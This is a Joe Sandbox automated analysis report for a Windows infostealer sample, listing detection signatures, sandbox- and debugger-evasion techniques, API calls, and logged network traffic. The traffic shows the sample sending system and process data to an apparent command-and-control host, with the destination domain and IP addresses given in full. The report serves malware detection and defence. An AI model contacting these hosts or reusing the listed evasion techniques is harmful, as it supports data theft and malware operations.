Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Tsy9P2T9yF.exe

Overview

General Information

Sample name:Tsy9P2T9yF.exe
renamed because original name is a hash value
Original sample name:03ae071235d37edc3ea30848462bccbc.exe
Analysis ID:1578993
MD5:03ae071235d37edc3ea30848462bccbc
SHA1:d8425df6c157fc8699596f64a0bf996692ebc947
SHA256:72662d9e82835cb7e3210889828befd75dd7921c8bb6c45f5757c23602432536
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Tsy9P2T9yF.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\Tsy9P2T9yF.exe" MD5: 03AE071235D37EDC3EA30848462BCCBC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Tsy9P2T9yF.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: Tsy9P2T9yF.exeReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Tsy9P2T9yF.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: -----BEGIN PUBLIC KEY-----0_2_004DDCF0
Source: Tsy9P2T9yF.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0051A5B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0051B560
Source: Tsy9P2T9yF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004B29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 577602Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 32 32 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0057A8C0 recvfrom,0_2_0057A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 577602Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 32 32 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322M
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Tsy9P2T9yF.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: Tsy9P2T9yF.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Tsy9P2T9yF.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

System Summary

barindex
PE file contains section with special chars
Source: Tsy9P2T9yF.exeStatic PE information: section name:
Source: Tsy9P2T9yF.exeStatic PE information: section name: .idata
Source: Tsy9P2T9yF.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_01183FF90_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C05B00_2_004C05B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C6FA00_2_004C6FA0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004EF1000_2_004EF100
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0057B1800_2_0057B180
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0083E0300_2_0083E030
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_005800E00_2_005800E0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_005162100_2_00516210
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0057C3200_2_0057C320
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_005804200_2_00580420
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008044100_2_00804410
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004BE6200_2_004BE620
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008347800_2_00834780
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0057C7700_2_0057C770
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0051A7F00_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008167300_2_00816730
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C49400_2_004C4940
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004BA9600_2_004BA960
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0056C9000_2_0056C900
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00686AC00_2_00686AC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0076AAC00_2_0076AAC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00644B600_2_00644B60
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0076AB2C0_2_0076AB2C
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00828BF00_2_00828BF0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004BCBB00_2_004BCBB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0083CC700_2_0083CC70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0082CD800_2_0082CD80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00834D400_2_00834D40
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00670D800_2_00670D80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_007CAE300_2_007CAE30
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00802F900_2_00802F90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004D4F700_2_004D4F70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0057EF900_2_0057EF90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00578F900_2_00578F90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C10E60_2_004C10E6
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0081D4300_2_0081D430
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008235B00_2_008235B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008417800_2_00841780
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_005698800_2_00569880
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008099200_2_00809920
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00833A700_2_00833A70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00821BD00_2_00821BD0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004F1BE00_2_004F1BE0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00817CC00_2_00817CC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00769C800_2_00769C80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C5DB00_2_004C5DB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004C3ED00_2_004C3ED0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004D5EB00_2_004D5EB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00839FE00_2_00839FE0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004F4FD0 appears 289 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 0068CBC0 appears 90 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004B75A0 appears 708 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 005944A0 appears 76 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004F4F40 appears 335 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004CCCD0 appears 54 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004F5340 appears 48 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004CCD40 appears 80 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004F50A0 appears 101 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 00667220 appears 99 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004BCAA0 appears 64 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004B71E0 appears 47 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004B73F0 appears 114 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: String function: 004BC960 appears 37 times
Source: Tsy9P2T9yF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Tsy9P2T9yF.exeStatic PE information: Section: zxrdxyue ZLIB complexity 0.9944245741875712
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004B29FF
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Tsy9P2T9yF.exeReversingLabs: Detection: 60%
Source: Tsy9P2T9yF.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Tsy9P2T9yF.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: uxtheme.dllJump to behavior
